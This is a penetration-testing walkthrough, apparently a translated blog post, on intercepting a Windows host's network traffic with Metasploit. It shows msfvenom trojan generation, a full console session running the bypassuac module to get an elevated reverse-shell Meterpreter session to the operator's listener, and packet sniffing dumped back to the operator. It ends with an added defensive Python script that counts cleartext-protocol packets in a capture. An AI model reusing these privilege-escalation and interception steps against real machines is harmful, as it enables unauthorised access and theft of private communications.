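Capturing a host's own packets on an internal network with msf
1. Use msf: generate the trojan program with msfvenom. Tested successfully on Win7 SP1. (http://www.2cto.com/Article/201304/199847.html)
2. Use the sniffer module
On Win7 one extra step is needed: getting past UAC. Here exploit/windows/local/bypassuac is used.
There is also another tool that can be used, though I have not tested it: Win7Elevate32.exe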
Bypass UAC: http://www.metasploit.com/modules/exploit/windows/local/bypassuac
meterpreter > background
[*] Backgrounding session 6...
msf exploit(handler) > use exploit/windows/local/bypassuac
msf exploit(bypassuac) > show options

Module options (exploit/windows/local/bypassuac):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  4                yes       The session to run this module on.

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST     192.168.0.133    yes       The listen address
   LPORT     443              yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows

msf exploit(bypassuac) > set SESSION 6
SESSION => 6
msf exploit(bypassuac) > exploit

[*] Started reverse handler on 192.168.0.133:443
[*] UAC is Enabled, checking level...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Checking admin status...
[+] Part of Administrators group! Continuing...
[*] Uploading the bypass UAC executable to the filesystem...
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Uploaded the agent to the filesystem....
[*] Sending stage (752128 bytes) to 192.168.0.103
[*] Meterpreter session 7 opened (192.168.0.133:443 -> 192.168.0.103:2309) at 2013-04-02 00:34:51 +0800

meterpreter >
meterpreter > pwd
C:\Windows\System32

meterpreter > use sniffer
Loading extension sniffer...success.
meterpreter > sniffer_interfaces

1 - 'WAN Miniport (Network Monitor)' ( type:3 mtu:1514 usable:true dhcp:false wifi:false )
2 - 'Intel(R) 82567LM Gigabit Network Connection' ( type:0 mtu:1514 usable:true dhcp:false wifi:false )
3 - 'VMware Virtual Ethernet Adapter for VMnet1' ( type:0 mtu:1514 usable:true dhcp:false wifi:false )
4 - '11b/g/n Wireless LAN Mini-PCI Express Adapter II' ( type:0 mtu:1514 usable:true dhcp:true wifi:false )
5 - 'VMware Virtual Ethernet Adapter for VMnet8' ( type:0 mtu:1514 usable:true dhcp:false wifi:false )

meterpreter > sniffer_start 4
[*] Capture started on interface 4 (50000 packet buffer)
meterpreter > sniffer_stats 4
[*] Capture statistics for interface 4
    packets: 2
    bytes: 115
meterpreter > sniffer_stats 4
[*] Capture statistics for interface 4
    packets: 173
    bytes: 109330
meterpreter > sniffer_dump 4 /tmp/mydump.cap
[*] Flushing packet capture buffer for interface 4...
[*] Flushed 225 packets (122383 bytes)
[*] Downloaded 100% (122383/122383)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to /tmp/mydump.cap
meterpreter > sniffer_stop 4
[*] Capture stopped on interface 4
[*] There are 32 packets (6987 bytes) remaining
[*] Download or release them using 'sniffer_dump' or 'sniffer_release'
meterpreter >
Finally, the collected network packets can be opened and viewed in Wireshark to find the content of interest.
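To gauge how much of a host's traffic a capture like this exposes, the following added example (not part of the original post) reads a classic pcap file and counts TCP packets going to or from unencrypted services. The port list, the helper names and the sample capture are constructed assumptions; it handles Ethernet/IPv4 captures only.

```python
import struct
from collections import Counter

# Assumed list of common unencrypted TCP services (illustrative, not exhaustive).
CLEARTEXT_PORTS = {21: "ftp", 23: "telnet", 25: "smtp", 80: "http", 110: "pop3", 143: "imap"}

def cleartext_summary(pcap_bytes):
    """Count TCP packets per unencrypted service in a classic pcap (Ethernet, IPv4)."""
    magic = pcap_bytes[:4]
    if magic == b"\xd4\xc3\xb2\xa1":
        end = "<"            # little-endian capture file
    elif magic == b"\xa1\xb2\xc3\xd4":
        end = ">"            # big-endian capture file
    else:
        raise ValueError("not a classic pcap file")
    if len(pcap_bytes) < 24 or struct.unpack(end + "I", pcap_bytes[20:24])[0] != 1:
        raise ValueError("only Ethernet captures (linktype 1) are handled")
    counts, off = Counter(), 24
    while off + 16 <= len(pcap_bytes):
        incl_len = struct.unpack(end + "I", pcap_bytes[off + 8:off + 12])[0]
        frame = pcap_bytes[off + 16:off + 16 + incl_len]
        off += 16 + incl_len
        if len(frame) < 34 or frame[12:14] != b"\x08\x00":
            continue         # truncated frame or not IPv4
        ihl = (frame[14] & 0x0F) * 4
        if frame[23] != 6 or len(frame) < 14 + ihl + 4:
            continue         # not TCP, or TCP ports cut off
        sport, dport = struct.unpack("!HH", frame[14 + ihl:14 + ihl + 4])
        service = CLEARTEXT_PORTS.get(dport) or CLEARTEXT_PORTS.get(sport)
        if service:
            counts[service] += 1
    return dict(counts)

def _frame(sport, dport):
    """Build a constructed 54-byte Ethernet/IPv4/TCP frame with empty payload."""
    eth = b"\x00" * 12 + b"\x08\x00"
    ip = (b"\x45\x00" + struct.pack("!H", 40) + b"\x00" * 4 + b"\x40\x06"
          + b"\x00\x00" + bytes([10, 0, 0, 5]) + bytes([10, 0, 0, 1]))
    tcp = struct.pack("!HH", sport, dport) + b"\x00" * 16
    return eth + ip + tcp

def sample_pcap():
    """Constructed capture: two HTTP packets, one HTTPS, one FTP."""
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    for sport, dport in [(50000, 80), (80, 50000), (50001, 443), (50002, 21)]:
        f = _frame(sport, dport)
        out += struct.pack("<IIII", 0, 0, len(f), len(f)) + f
    return out
```

Services that show up in the summary are the ones whose contents are readable from such a capture and are candidates for moving to TLS-protected equivalents.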